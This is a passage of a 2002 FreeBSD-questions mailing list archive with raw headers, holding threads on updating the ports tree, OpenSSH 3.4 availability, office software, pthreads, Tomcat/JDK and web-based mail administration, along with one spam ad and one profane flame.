replied. Right now I'm installing portupgrade and will be upgrading > all the installed ports. > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-questions" in the body of the message -- ******************************* David Wilk System Administrator Community Internet Access, Inc. admin@cia-g.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Wed Jun 26 11:12: 7 2002 Delivered-To: freebsd-questions@freebsd.org Received: from mail.intekom.com (mid-mail-02.intekom.com [196.25.69.45]) by hub.freebsd.org (Postfix) with SMTP id CD9F337B400 for ; Wed, 26 Jun 2002 11:11:50 -0700 (PDT) Received: (qmail 14171 invoked from network); 26 Jun 2002 18:11:41 -0000 Received: from cn53-01-p184.wc.saix.net (HELO Kantoor) ([155.239.131.184]) (envelope-sender ) by telkomsa.net (qmail-ldap-1.03) with SMTP for ; 26 Jun 2002 18:11:41 -0000 X-vSMTP: telkomsa.net Message-ID: <000a01c21d3b$f6ddc440$c6e3fea9@telkomsa.net> From: "Brenda Steenkamp" To: Subject: Application can be used with FreeBSD Date: Wed, 26 Jun 2002 20:04:40 +0200 Organization: Meyer Beton, Carit, Patria, SpoorTransport MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_NextPart_000_0007_01C21D4C.B4F880E0" X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4133.2400 Disposition-Notification-To: "Brenda Steenkamp" X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4133.2400 Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG This is a multi-part message in MIME format. ------=_NextPart_000_0007_01C21D4C.B4F880E0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable Hi there What applications (Office Suite, Accounting package etc.) could be used = with FreeBSD Thanks Martin Meyer meyerbet@telkomsa.net ------=_NextPart_000_0007_01C21D4C.B4F880E0 Content-Type: text/html; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable
Hi there
 
What applications (Office Suite, = Accounting package=20 etc.) could be used with FreeBSD
 
Thanks
 
Martin Meyer
meyerbet@telkomsa.net
 
------=_NextPart_000_0007_01C21D4C.B4F880E0-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Wed Jun 26 11:14:44 2002 Delivered-To: freebsd-questions@freebsd.org Received: from dragoncrest.jasnetworks.net (dragoncrest.jasnetworks.net [65.194.254.12]) by hub.freebsd.org (Postfix) with ESMTP id 532A137B400 for ; Wed, 26 Jun 2002 11:14:42 -0700 (PDT) Received: from works (works.jasnetworks.net [192.168.0.2]) by dragoncrest.jasnetworks.net (8.12.3/8.11.6) with ESMTP id g5QIQYgh005495 for ; Wed, 26 Jun 2002 14:26:34 -0400 (EDT) (envelope-from raiden23@netzero.net) Message-Id: <4.2.0.58.20020626142109.0095b880@pop.netzero.net> X-Sender: raiden23@pop.netzero.net X-Mailer: QUALCOMM Windows Eudora Pro Version 4.2.0.58 Date: Wed, 26 Jun 2002 14:22:19 -0400 To: FreeBDS-Questions From: Lord Raiden Subject: OpenSSH 3.4 available?? Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG Is OpenSSH 3.4 available now in the ports? Cause the announcement about it just went out on Slashdot and Bugtraq a day early. So I need to hurry up and get on the ball with finishing my upgrade. Thanks all. - The Raiden Knows "Remember amateurs built the ark -- professionals built the Titanic." - Unknown "Just when you think you have life figured out and all is going well, watch your step, for you are about to fall." - Ancient Proverb To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Wed Jun 26 11:16: 3 2002 Delivered-To: freebsd-questions@freebsd.org Received: from mailgate.sri.com (mailgate.SRI.COM [128.18.243.11]) by hub.freebsd.org (Postfix) with SMTP id 30B8337B400 for ; Wed, 26 Jun 2002 11:15:57 -0700 (PDT) Received: (qmail 895 invoked from network); 26 Jun 2002 18:15:32 -0000 Received: from localhost (HELO mailgate.SRI.COM) (127.0.0.1) by mailgate.sri.com with SMTP; 26 Jun 2002 18:15:32 -0000 Received: from quarter.csl.sri.com ([130.107.1.30]) by mailgate.SRI.COM (NAVGW 2.5.1.18) with SMTP id M2002062611153216446 ; Wed, 26 Jun 2002 11:15:32 -0700 Received: from axp.csl.sri.com (axp.csl.sri.com [130.107.2.30]) by quarter.csl.sri.com (8.12.4/8.12.4) with ESMTP id g5QIFt46011318; Wed, 26 Jun 2002 11:15:55 -0700 Received: from axp.csl.sri.com (localhost [127.0.0.1]) by axp.csl.sri.com (8.12.3/8.11.6) with ESMTP id g5QIFqqL037064; Wed, 26 Jun 2002 11:15:55 -0700 (PDT) (envelope-from hogsett@axp.csl.sri.com) Message-Id: <200206261815.g5QIFqqL037064@axp.csl.sri.com> To: "Brenda Steenkamp" Cc: freebsd-questions@FreeBSD.ORG Subject: Re: Application can be used with FreeBSD In-Reply-To: Your message of "Wed, 26 Jun 2002 20:04:40 +0200." <000a01c21d3b$f6ddc440$c6e3fea9@telkomsa.net> Mime-Version: 1.0 (generated by tm-edit 8.8 (Time Passed Me By)) Content-Type: text/plain; charset=US-ASCII Date: Wed, 26 Jun 2002 11:15:52 -0700 From: Mike Hogsett Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG Open Office (/usr/ports/editors/openoffice/ )looks like it works, but I haven't installed it yet. - Michael Hogsett > This is a multi-part message in MIME format. > > ------=_NextPart_000_0007_01C21D4C.B4F880E0 > Content-Type: text/plain; > charset="iso-8859-1" > Content-Transfer-Encoding: quoted-printable > > Hi there > > What applications (Office Suite, Accounting package etc.) could be used = > with FreeBSD > > Thanks > > Martin Meyer > meyerbet@telkomsa.net > > > ------=_NextPart_000_0007_01C21D4C.B4F880E0 > Content-Type: text/html; > charset="iso-8859-1" > Content-Transfer-Encoding: quoted-printable > > > > charset=3Diso-8859-1"> > > > > >
Hi there
>
 
>
What applications (Office Suite, = > Accounting package=20 > etc.) could be used with FreeBSD
>
 
>
Thanks
>
 
>
Martin Meyer
>
href=3D"mailto:meyerbet@telkomsa.net">meyerbet@telkomsa.net IV> >
 
> > ------=_NextPart_000_0007_01C21D4C.B4F880E0-- > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-questions" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Wed Jun 26 11:16:38 2002 Delivered-To: freebsd-questions@freebsd.org Received: from infinity.aesredfish.net (ns1.aesredfish.net [65.168.0.12]) by hub.freebsd.org (Postfix) with ESMTP id 53B2037B407 for ; Wed, 26 Jun 2002 11:16:34 -0700 (PDT) Received: from potentialtech.com (mhope-dhcp-65-168-1-181.dashfast.com [65.168.1.181]) by infinity.aesredfish.net (8.11.6/8.11.0) with ESMTP id g5QIGHr19415; Wed, 26 Jun 2002 14:16:18 -0400 Message-ID: <3D1A066B.3060104@potentialtech.com> Date: Wed, 26 Jun 2002 14:22:35 -0400 From: Bill Moran User-Agent: Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.0rc1) Gecko/20020502 X-Accept-Language: en-us, en MIME-Version: 1.0 To: Brenda Steenkamp Cc: freebsd-questions@FreeBSD.ORG Subject: Re: Application can be used with FreeBSD References: <000a01c21d3b$f6ddc440$c6e3fea9@telkomsa.net> Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG Brenda Steenkamp wrote: > Hi there > > What applications (Office Suite, Accounting package etc.) could be used > with FreeBSD http://www.freebsd.org/ports/ Take your time, you'll need lots of it. There are something like 5000 applications directly ported to FreeBSD. That doesn't include the fact that a large percentage of Linux programs run just fine on FreeBSD. -- Bill Moran Potential Technologies http://www.potentialtech.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Wed Jun 26 11:17: 2 2002 Delivered-To: freebsd-questions@freebsd.org Received: from mhu01-tic-bre.durand.com.br (mail.tavola.com.br [200.168.245.202]) by hub.freebsd.org (Postfix) with SMTP id A9FC637B409 for ; Wed, 26 Jun 2002 11:16:41 -0700 (PDT) Received: (qmail 19667 invoked from network); 26 Jun 2002 18:15:52 -0000 Received: from unknown (HELO VAIO.supero.com.br) (200.171.2.135) by 0 with SMTP; 26 Jun 2002 18:15:52 -0000 Message-Id: <5.1.0.14.0.20020626150906.00acc118@mail.supero.com.br> X-Sender: guilherme@supero.com.br@mail.supero.com.br X-Mailer: QUALCOMM Windows Eudora Version 5.1 Date: Wed, 26 Jun 2002 15:13:57 -0700 To: freebsd-questions@freebsd.org From: guilherme komel Subject: Tomcat + Apache + JDK Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG Hello all, many thanx for taking the time. I am installing a Tomcat 4 + Apache 1.3 + JDK . I have not being able to find accurate updated information on freebsd.org/java page and I wonder what version of the JDK I am able to run natively (not using Linux compat) on the FreeBSD 4.6 ... . could anybody help me out? on before hand thank you very much. guilherme To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Wed Jun 26 11:17: 1 2002 Delivered-To: freebsd-questions@freebsd.org Received: from cxnsvexca1.conxion.com (cxnsvexca1.conxion.com [206.204.17.19]) by hub.freebsd.org (Postfix) with ESMTP id C2F3237B400 for ; Wed, 26 Jun 2002 11:16:51 -0700 (PDT) Received: by cxnsvexca1.conxion.com with Internet Mail Service (5.5.2653.19) id ; Wed, 26 Jun 2002 11:16:51 -0700 Message-ID: <543C1849215F0D42A000D43EC0597CB25A848D@cxnsvexca1.conxion.com> From: "Balan, Sapna" To: "'questions@FreeBSD.org'" Subject: pthread library Date: Wed, 26 Jun 2002 11:16:49 -0700 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.5.2653.19) Content-Type: text/plain; charset="iso-8859-1" Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG Hello, Where can I find pthread library for FreeBSD? thanks s To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Wed Jun 26 11:21:43 2002 Delivered-To: freebsd-questions@freebsd.org Received: from dragoncrest.jasnetworks.net (dragoncrest.jasnetworks.net [65.194.254.12]) by hub.freebsd.org (Postfix) with ESMTP id E7BB537B408 for ; Wed, 26 Jun 2002 11:20:27 -0700 (PDT) Received: from works (works.jasnetworks.net [192.168.0.2]) by dragoncrest.jasnetworks.net (8.12.3/8.11.6) with ESMTP id g5QIWPgh005512 for ; Wed, 26 Jun 2002 14:32:25 -0400 (EDT) (envelope-from raiden23@netzero.net) Message-Id: <4.2.0.58.20020626142220.009bec10@pop.netzero.net> X-Sender: raiden23@pop.netzero.net X-Mailer: QUALCOMM Windows Eudora Pro Version 4.2.0.58 Date: Wed, 26 Jun 2002 14:28:11 -0400 To: freebsd-questions@FreeBSD.ORG From: Lord Raiden Subject: Web admin interface for the less skilled Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG HI all. Looking for a good web interface that is either a drop in place, or limited config administration package that will allow someone not familiar with FreeBSD to be able to admin a mail server. I don't need anything special. All this person needs to do is add a user or delete a user, and the users added should have minimal privaledges, because it's only going to be used as a mail server, nothing else. It's also going to be hidden behind a firewall at a client's location so security is not that big a deal either because the machine is going to be locked down from the outside. Since the user will be admin'ing it themselves, I need to make maintaining this as easy as possible for them. Any suggestions or ports would be welcome. Thanks. - The Raiden Knows "Remember amateurs built the ark -- professionals built the Titanic." - Unknown "Just when you think you have life figured out and all is going well, watch your step, for you are about to fall." - Ancient Proverb To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Wed Jun 26 11:24:38 2002 Delivered-To: freebsd-questions@freebsd.org Received: from mail.macconnect.com (mail.macconnect.com [204.68.168.11]) by hub.freebsd.org (Postfix) with SMTP id E857837B446 for ; Wed, 26 Jun 2002 11:22:32 -0700 (PDT) Received: (qmail 4967 invoked by uid 0); 26 Jun 2002 18:29:30 -0000 Received: from unknown (HELO ?10.0.1.7?) (66.108.173.12) by mail.macconnect.com with SMTP; 26 Jun 2002 18:29:30 -0000 User-Agent: Microsoft-Entourage/10.1.0.2006 Date: Wed, 26 Jun 2002 14:22:29 -0400 Subject: Re: OpenSSH 3.4 available?? From: Brendan McAlpine To: Lord Raiden , FreeBDS-Questions Message-ID: In-Reply-To: <4.2.0.58.20020626142109.0095b880@pop.netzero.net> Mime-version: 1.0 Content-type: text/plain; charset="US-ASCII" Content-transfer-encoding: 7bit Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG I downloaded the new set of ports today after reading those announcements. However, the openssh version in the ports is still 3.3. Brendan > From: Lord Raiden > Date: Wed, 26 Jun 2002 14:22:19 -0400 > To: FreeBDS-Questions > Subject: OpenSSH 3.4 available?? > > Is OpenSSH 3.4 available now in the ports? Cause the announcement about > it just went out on Slashdot and Bugtraq a day early. So I need to hurry > up and get on the ball with finishing my upgrade. Thanks all. > > - The Raiden Knows > > "Remember amateurs built the ark -- professionals built the Titanic." - > Unknown > > "Just when you think you have life figured out and all is going well, watch > your step, for you are about to fall." - Ancient Proverb > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-questions" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Wed Jun 26 11:26: 4 2002 Delivered-To: freebsd-questions@freebsd.org Received: from labs.unixhideout.com (dsl-65-187-193-189.telocity.com [65.187.193.189]) by hub.freebsd.org (Postfix) with ESMTP id 042D637B4EF for ; Wed, 26 Jun 2002 11:23:32 -0700 (PDT) Received: from unixhideout.com (webserver@localhost.unixhideout.com [192.168.1.20]) by labs.unixhideout.com (8.12.4/8.12.3) with SMTP id g5QINRQ9075620; Wed, 26 Jun 2002 14:23:29 -0400 (EDT) (envelope-from root@unixhideout.com) Received: from 192.168.1.10 (SquirrelMail authenticated user ro0t) by email.unixhideout.com with HTTP; Wed, 26 Jun 2002 14:23:29 -0400 (EDT) Message-ID: <1534.192.168.1.10.1025115809.squirrel@email.unixhideout.com> Date: Wed, 26 Jun 2002 14:23:29 -0400 (EDT) Subject: Re: I hate to bring it up again (spamming) From: "Mike" To: , In-Reply-To: <200206261816.g5QIG9R18230@clunix.cl.msu.edu> References: <1752.192.168.1.10.1025082462.squirrel@email.unixhideout.com> from "Network Administrator" at Jun 26, 2002 05:07:42 AM <200206261816.g5QIG9R18230@clunix.cl.msu.edu> X-Priority: 3 Importance: Normal X-MSMail-Priority: Normal Reply-To: root@unixhideout.com X-Mailer: SquirrelMail (version 1.2.7) MIME-Version: 1.0 Content-Type: text/plain; charset=iso-8859-1 Content-Transfer-Encoding: 8bit Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG >> > Can you please send as normal user and not as root ? >> > >> > Read RFC's. >> > >> > Thanks >> > >> > >> 24 hours on this list is enough for me, im unsubscribing. > > OK. No problem. > >> wtf do you care >> about my email for? What business is it of yours? this fucking list is >> like a big soap opera. All you skirts with nothing better to do but >> flame and poke and prod at people. I got goofball #1 over here trying >> to send me viruses, everyone else on the list sticks up for him, and >> calls him the victim and flames me because im the only one who has the >> balls to do something about him, and i got you poking at my email. who >> cares if i use root. Try and exploit something see what happens to >> your lan. fucking christ leave me alone. > > Suggestions: Grow up. Treat people like people and clean up your > mouth! > (~) does it hurt? ----------------------------------------- The unixhideout network. "http://www.unixhideout.com" To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Wed Jun 26 11:26:44 2002 Delivered-To: freebsd-questions@freebsd.org Received: from c007.snv.cp.net (h013.c007.snv.cp.net [209.228.33.241]) by hub.freebsd.org (Postfix) with SMTP id E9CE837B62A for ; Wed, 26 Jun 2002 11:23:53 -0700 (PDT) Received: (cpmta 26632 invoked from network); 26 Jun 2002 11:23:45 -0700 Received: from 65.190.43.14 (HELO SERVIDOR) by smtp.directvinternet.com (209.228.33.241) with SMTP; 26 Jun 2002 11:23:45 -0700 X-Sent: 26 Jun 2002 18:23:45 GMT Message-ID: <01a601c21d3e$9b8815c0$0101080a@SERVIDOR> From: "Sercoinca INC." To: "Sercoincainc" Subject: Ofertas en Pentium IV Date: Wed, 26 Jun 2002 14:22:06 -0400 Organization: SERCOINCA INC MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_NextPart_000_01A3_01C21D1C.D9DF8730" X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2600.0000 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG This is a multi-part message in MIME format. ------=_NextPart_000_01A3_01C21D1C.D9DF8730 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable Intel Pentium 4 478pin=20 .BX80531NK190G BOX P4-1900/478pin/256k 70 pc $164 .BX80532PC2200D BOX P4-2200/478pin/512k 60 pc $230 .BX80532PE2400D BOX P4-2400/478pin/512k/533MHz 5 pc $389 .BX80532PC1800D BOX P4-1800/478pin/512k 200+ pc $159 .BX80531NK170G BOX P4-1700/478pin/256k 200+ pc $139 .BX80531NK160G BOX P4-1600/478pin/256k 200+ pc $135 .BX80532PC2000D BOX P4-2000/478pin/512k 200 pc $185 PRECIOS SUJETOS A CAMBIO SIN PREVIO *** APLICAN CANTIDADES MINIMAS SERCOINCA INC=20 For more Information Please contact GRECIA or JUAN=20 3900 nw 79 av. Suite 532 Miami, FL - 33166 - USA=20 Tel 305-5932991 Fax 305-5938197 Cel 305-2189064 email: sercoinc@bellsouth.net msn: gbuysse2001@hotmail.com ------=_NextPart_000_01A3_01C21D1C.D9DF8730 Content-Type: text/html; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable
 
Intel Pentium 4 478pin
.BX80531NK190G  =20  BOX   P4-1900/478pin/256k=20          70  pc   = $164
.BX80532PC2200D   BOX =20  P4-2200/478pin/512k        =  =20 60  pc   $230

.BX80532PE2400D   = BOX   P4-2400/478pin/512k/533MHz    5=20  pc   $389

.BX80532PC1800D   = BOX =20  P4-1800/478pin/512k        = 200+=20 pc   $159
.BX80531NK170G   =20 BOX  =20 P4-1700/478pin/256k         200+ = pc   $139
.BX80531NK160G    BOX =20  P4-1600/478pin/256k        = 200+=20 pc   $135
.BX80532PC2000D   = BOX =20  P4-2000/478pin/512k        = =20 200  pc   $185
 
PRECIOS SUJETOS A CAMBIO SIN PREVIO *** APLICAN CANTIDADES = MINIMAS
 
SERCOINCA INC
For more Information Please = contact=20  GRECIA or JUAN
3900 nw 79 av. Suite 532 Miami, FL - 33166 - = USA=20
Tel 305-5932991    Fax 305-5938197    = Cel=20 305-2189064

email:
sercoinc@bellsouth.net
<= /FONT>
msn: gbuysse2001@hotmail.com
<= /FONT>
------=_NextPart_000_01A3_01C21D1C.D9DF8730-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Wed Jun 26 11:30:46 2002 Delivered-To: freebsd-questions@freebsd.org Received: from mailer.cia-g.com (mailer.cia-g.com [65.100.115.10]) by hub.freebsd.org (Postfix) with ESMTP id D75D237B641 for ; Wed, 26 Jun 2002 11:24:22 -0700 (PDT) Received: from cygnus.cia-g.com (data.cia-g.com [65.100.119.165]) by mailer.cia-g.com (Postfix) with ESMTP id 9AAD736A5; Wed, 26 Jun 2002 12:41:23 -0600 (MDT) Received: from raz by cygnus.cia-g.com with local (Exim 3.12 #1 (Debian)) id 17NHSn-0003DN-00; Wed, 26 Jun 2002 12:24:21 -0600 Date: Wed, 26 Jun 2002 12:24:21 -0600 From: David Wilk To: Kent Stewart Cc: FreeBSD-Questions Subject: Re: Updating my ports tree? Message-ID: <20020626122421.D10404@cygnus.wks.Gallup.cia-g.com> Mail-Followup-To: David Wilk , Kent Stewart , FreeBSD-Questions References: <3D19267F.8A2FCFE5@pantherdragon.org> <3D194689.6050806@owt.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <3D194689.6050806@owt.com>; from kstewart@owt.com on Tue, Jun 25, 2002 at 09:43:53PM -0700 Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG Kent, I appreciate your input here. I am curious. The manual chapter on ports tree upgrading doesn't mention these INDEX files. Is there not a way to update those with the rest of the Ports tree? I guess I just figured they would automatically be updated with the tree they represent. or, are they maintained outside of the ports tree by portupgrade? I'm a bit new to the FreeBSD thing, but like what I've seen so far. Oh, also, I've upgraded to OpenSSH-3.4p1 on most of my other servers and am wondering what the general thought of replacing the OpenSSH in the base install with the OpenSSH in ports is? thanks, Dave On Tue, Jun 25, 2002 at 09:43:53PM -0700 or thereabouts, Kent Stewart wrote: > > > Darren Pilgrim wrote: > > > Aaron Burke wrote: > > > >>>-----Original Message----- > >>>From: owner-freebsd-questions@FreeBSD.ORG > >>>[mailto:owner-freebsd-questions@FreeBSD.ORG]On Behalf Of Darren Pilgrim > >>>Sent: Tuesday, June 25, 2002 06:16 PM > >>>To: freebsd-questions@FreeBSD.ORG > >>>Subject: Updating my ports tree? > >>> > >>> > >>>I have a 4.5-R machine for which I'd like to update my ports tree. > >>>I really just want the current openssh-portable port, but I figure I > >>>might as well update the whole tree while I'm at it. Do I need to > >>>fetch the tree for -stable, or do I just fetch it from the default in > >>>the example supfile (which is .)? > >>> > >>They are not the same supfiles. Also the ports are constantly changing. > >>I use the supfile from /usr/share/examples/cvsup/ports-supfile. The only > >>thing that needs changing is the cvsup server. I also copied this file > >>to /root. Just make the changes and run > >>"cvsup -g -L 2 /root/ports-supfile" to get the new ports installed. > >> > > > > Thanks for your reply, but I managed to get it to work before anyone > > replied. Right now I'm installing portupgrade and will be upgrading > > all the installed ports. > > > Don't forget to update your /usr/ports/INDEX.* files after you cvsup > ports-all. Since you have installed portupgrade, you can use > portsdb -uU to update them. Otherwise, you are using old dependancies. > > Kent > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > with "unsubscribe freebsd-questions" in the body of the message > > > > . > > > > > > > -- > Kent Stewart > Richland, WA > > http://users.owt.com/kstewart/index.html > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-questions" in the body of the message -- ******************************* David Wilk System Administrator Community Internet Access, Inc. admin@cia-g.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Wed Jun 26 11:31:18 2002 Delivered-To: freebsd-questions@freebsd.org Received: from dan.emsphone.com (dan.emsphone.com [199.67.51.101]) by hub.freebsd.org (Postfix) with ESMTP id AE64F37B6D4 for ; Wed, 26 Jun 2002 11:26:48 -0700 (PDT) Received: (from dan@localhost) by dan.emsphone.com (8.12.3/8.12.3) id g5QIQkvX082570; Wed, 26 Jun 2002 13:26:46 -0500 (CDT) (envelope-from dan) Date: Wed, 26 Jun 2002 13:26:46 -0500 From: Dan Nelson To: "Balan, Sapna" Cc: "'questions@FreeBSD.org'" Subject: Re: pthread library Message-ID: <20020626182646.GA1201@dan.emsphone.com> References: <543C1849215F0D42A000D43EC0597CB25A848D@cxnsvexca1.conxion.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <543C1849215F0D42A000D43EC0597CB25A848D@cxnsvexca1.conxion.com> X-OS: FreeBSD 5.0-CURRENT X-message-flag: Outlook Error User-Agent: Mutt/1.5.1i Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG In the last episode (Jun 26), Balan, Sapna said: > Hello, > > Where can I find pthread library for FreeBSD? man pthread. Baically compile and link with the -pthread flag. -- Dan Nelson dnelson@allantgroup.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Wed Jun 26 11:34:45 2002 Delivered-To: freebsd-questions@freebsd.org Received: from mailer.cia-g.com (mailer.cia-g.com [65.100.115.10]) by hub.freebsd.org (Postfix) with ESMTP id 05E2437B683 for ; Wed, 26 Jun 2002 11:25:25 -0700 (PDT) Received: from cygnus.cia-g.com (data.cia-g.com [65.100.119.165]) by mailer.cia-g.com (Postfix) with ESMTP id 5EDA1355A; Wed, 26 Jun 2002 12:42:26 -0600 (MDT) Received: from raz by cygnus.cia-g.com with local (Exim 3.12 #1 (Debian)) id 17NHTo-0003Du-00; Wed, 26 Jun 2002 12:25:24 -0600 Date: Wed, 26 Jun 2002 12:25:24 -0600 From: David Wilk To: Lord Raiden Cc: FreeBDS-Questions Subject: Re: OpenSSH 3.4 available?? Message-ID: <20020626122524.E10404@cygnus.wks.Gallup.cia-g.com> Mail-Followup-To: David Wilk , Lord Raiden , FreeBDS-Questions References: <4.2.0.58.20020626142109.0095b880@pop.netzero.net> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <4.2.0.58.20020626142109.0095b880@pop.netzero.net>; from raiden23@netzero.net on Wed, Jun 26, 2002 at 02:22:19PM -0400 Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG not sure if you thought of this already, but a CVSup of your ports tree should tell you pretty quick. On Wed, Jun 26, 2002 at 02:22:19PM -0400 or thereabouts, Lord Raiden wrote: > Is OpenSSH 3.4 available now in the ports? Cause the announcement about > it just went out on Slashdot and Bugtraq a day early. So I need to hurry > up and get on the ball with finishing my upgrade. Thanks all. > > - The Raiden Knows > > "Remember amateurs built the ark -- professionals built the Titanic." - > Unknown > > "Just when you think you have life figured out and all is going well, watch > your step, for you are about to fall." - Ancient Proverb > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-questions" in the body of the message -- ******************************* David Wilk System Administrator Community Internet Access, Inc. admin@cia-g.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Wed Jun 26 11:37:13 2002 Delivered-To: freebsd-questions@freebsd.org Received: from intergate.sdccd.cc.ca.us (intergate.sdccd.cc.ca.us [209.129.16.2]) by hub.freebsd.org (Postfix) with ESMTP id 6D73D37B68E for ; Wed, 26 Jun 2002 11:25:21 -0700 (PDT) Received: from ntxdistrict.sdccd.cc.ca.us (ntxdistrict.sdccd.cc.ca.us [10.1.100.1]) by intergate.sdccd.cc.ca.us (8.9.1a/8.9.1) with ESMTP id LAA21089; Wed, 26 Jun 2002 11:24:56 -0700 (PDT) Received: by ntxdistrict.sdccd.cc.ca.us with Internet Mail Service (5.5.2654.89) id ; Wed, 26 Jun 2002 11:23:55 -0700 Message-ID: From: Erin Fortenberry To: "'Lord Raiden'" , freebsd-questions@FreeBSD.ORG Subject: RE: Web admin interface for the less skilled Date: Wed, 26 Jun 2002 11:23:52 -0700 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.5.2654.89) Content-Type: text/plain; charset="iso-8859-1" Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG http://www.webmin.com Erin > -----Original Message----- > From: Lord Raiden [mailto:raiden23@netzero.net] > Sent: Wednesday, June 26, 2002 11:28 AM > To: freebsd-questions@FreeBSD.ORG > Subject: Web admin interface for the less skilled > > > HI all. Looking for a good web interface that is > either a drop in place, > or limited config administration package that will allow someone not > familiar with FreeBSD to be able to admin a mail server. I > don't need > anything special. All this person needs to do is add a user > or delete a > user, and the users added should have minimal privaledges, > because it's > only going to be used as a mail server, nothing else. > > It's also going to be hidden behind a firewall at a > client's location so > security is not that big a 